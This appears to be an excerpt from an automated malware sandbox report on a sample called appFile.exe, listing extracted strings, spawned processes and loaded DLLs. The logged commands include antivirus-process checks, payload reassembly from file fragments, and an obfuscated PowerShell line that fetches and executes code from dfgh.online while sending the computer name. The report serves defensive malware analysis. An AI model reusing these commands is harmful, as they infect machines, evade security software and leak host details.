active editions will be availableFailed to validate edition consistencyPlan: Package %S declares capability %S and it is still required by package: %S, cannot remove.Plan: Impactful operation detected for a non-impactful session, package:%SFailed to validate capability removalFailed to re-install supersed versions for package: %SFailed to recall or supersed lower version on package: %SarrOwnerFlags.GetSize() == arrOwners.GetSize()pAllOwnerState!sczOwnerFailed to add new owner state.Failed to allocate execution package.Failed to allocate a BulkComponentAdder object.pCommunicationFailed to enumerate the next block of componentsFailed to get enumerator for missing components.Failed to allocate a path for identity.Got %d identities from enum, only expected %dFailed to send progress.F
      Source: appFile.exeString found in binary or memory: ?0CMCNCOCRCUCVCWCXCYCZDEDJDKDMDODZECEEEGEHERESETFIFJFKFMFOFRGAGBGDGEGFGGGHGIGLGMGNGPGQGRGSGTGUGWGYHKHMHNHRHTHUIDIEILIMINIOIQIRISITJEJMJOJPKEKGKHKIKMKNKPKRKWKYKZLALBLCLILKLRLSLTLULVLYMAMCMDMEMFMGMHMKMLMMMNMOMPMQMRMSMTMUMVMWMXMYMZNANCNENFNGNINLNONPNRNUNZOMPAPEPFPGPHPKPLPMPNPRPSPTPWPYQARERORSRURWSASBSCSDSESGSHSISJSKSLSMSNSOSRSSSTSVSXSYSZTCTDTFTGTHTJTKTLTMTNTOTRTTTVTWTZUAUGUMUSUYUZVAVCVEVGVIVNVUWFWSYEYTZAZMZWANBUCSFXSUTPYDYUZRDDDYHVNHRHUKVDANDAREAFGATGAIAALBAGOATAARGASMAUTAUSABWALAAZEBIHBGDBFABGRBHRBDIBENBLMBMUBESBRABHSBVTBWABLRBLZCANCCKCODCAFCOGCIVCOKCHLCMRCHNCOLCRICUBCPVCUWCXRCZEDEUDJIDNKDMADOMDZAECUESTEGYESHERIETHFINFJIFLKFSMFROFRAGABGBRGEOGUFGGYGHAGIBGRLGMBGINGLPGNQGRCSGSGTMGUMGNBGUYHKGHMDHNDHRVHTIHUNIDNIRLISRIMNINDIOTIRQIRNISLITAJEYJAMJORJPNKENKGZKHMKIRCOMKNAPRKKORKWTCYMKAZLAOLBNLCALIELKALBRLSOLTULUXLVALBYMARMCOMDAMNEMDGMHLMLIMMRMNGMACMNPMTQMRTMSRMLTMUSMDVMWIMEXMYSMOZNAMNCLNERNFKNGANLDNORNPLNRUNIUNZLOMNPANPERPYFPNGPHLPAKPOLSPMPCNPRIPSEPRTPLWPRYQATREUROUSRBRUSRWASAUSLBSYCSDNSWESGPSHNSVNSJMSVKSLESMRSENSOMSSDSTPSLVSXMSYRSWZTCATCDATFTGOTHATJKTKLTLSTKMTUNTONTURTTOTUVTWNTZAUKRUGAUMIUSAURYUZBVATVCTVENVGBVIRVNMVUTWLFWSMYEMMYTZAFZMBZWEANTBURSCGFXXROMSUNTMPYMDYUGart_LOJBANhy__AREVELAhy__AREVMDAhywzh_GANzh_GUOYUzh_HAKKAzh_MIN_NANzh_WUUzh_XIANGzh_YUE@und_collation%+1.1fi-defaultZzzzZZlikelySubtagsrgZZZZroot-en-es-pt-zh-ja-ko-de-fr-it-ar+he+fa+ru-nl-pl-th-tr-InstalledLocalesres_indexart-lojbanen-gb-oeden-gb-oxendicti-amiamii-bnnbnni-haki-klingoni-luxi-navajoi-pwnpwni-taotaoi-taytayi-tsutsuno-bokno-nynsgn-be-frsfbsgn-be-nlvgtsgn-ch-desggzh-guoyucmnzh-hakkazh-min-nanzh-xiangcel-gaulishxtg-x-cel-gaulishi-defaulten-x-i-defaulti-enochianund-x-i-enochiani-mingosee-x-i-mingozh-minnan-x-zh-minsgn-brbzssgn-cocsnsgn-degsgsgn-dkdslsgn-essspsgn-frfslsgn-gbbfisgn-grgsssgn-ieisgsgn-itisesgn-jpjslsgn-mxmfssgn-nincssgn-nldsesgn-nonslsgn-ptpsrsgn-seswlsgn-ussgn-zasfszh-cmnzh-cmn-hanscmn-hanszh-cmn-hantcmn-hantzh-ganzh-wuuzh-yueja-latn-hepburn-heplocja-latn-alalc97--u;=undposixlvariantvaBUMMDDDEFXFRTPTLYDYEZRCDyesinidiwhejiyijwjvmoroaamaasadpdzauektzayxnunbgmbcgbjddrlccqrkicjrmomckacmrcmkxchcoypijcququhdrhkhkdrwprsgavdevgfxvajggngvrgtinycguvduzhrrjalibiopailwgaljegoybkgctdfkghkmlkojkwvkrmbmfktrdtpkvsgdjkwqyamkxetvdkzjdtpkztdtpliiraqlmmrmxmegcirmstmrymwjvajmytmrynadxnyncpkdznnxngvntspijounvajpcradxpmchuwpmuphrppabfypprlcqpryprtpuzpubscahleskkoybtdudtpthctpothxoybtierastkktwmtlwweotmptyjtnekakt
      Source: appFile.exeString found in binary or memory: F\SOFTWARE\Microsoft\Reliability Analysis\WMILogPathsBaseTimeSystemApplicationMicrosoft-Windows-AppHost/AdminApplication ErrorApplication HangMicrosoft-Windows-AppHostMicrosoft-Windows-DiskDiagnosticMicrosoft-Windows-WER-SystemErrorReportingEventLogMicrosoft-Windows-StartupRepairMicrosoft-Windows-WindowsUpdateC
      Source: C:\Users\user\Desktop\appFile.exeFile read: C:\Users\user\Desktop\appFile.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\appFile.exe "C:\Users\user\Desktop\appFile.exe"
      Source: C:\Users\user\Desktop\appFile.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Shore Shore.cmd & Shore.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 723356
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Guitar
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Principle" Portions
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Requirements + ..\Ul + ..\Pupils + ..\Vista + ..\Sound + ..\Shelf F
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\723356\Ted.com Ted.com F
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess created: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe "C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe"
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp "C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp" /SL5="$4041A,11205210,845824,C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe "C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp "C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp" /SL5="$5041A,11205210,845824,C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
      Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe"
      Source: C:\Users\user\Desktop\appFile.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Shore Shore.cmd & Shore.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 723356Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E GuitarJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Principle" Portions Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Requirements + ..\Ul + ..\Pupils + ..\Vista + ..\Sound + ..\Shelf FJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\723356\Ted.com Ted.com FJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess created: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe "C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe"Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp "C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp" /SL5="$4041A,11205210,845824,C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe "C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp "C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp" /SL5="$5041A,11205210,845824,C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: mswsock.dllJump to behavior
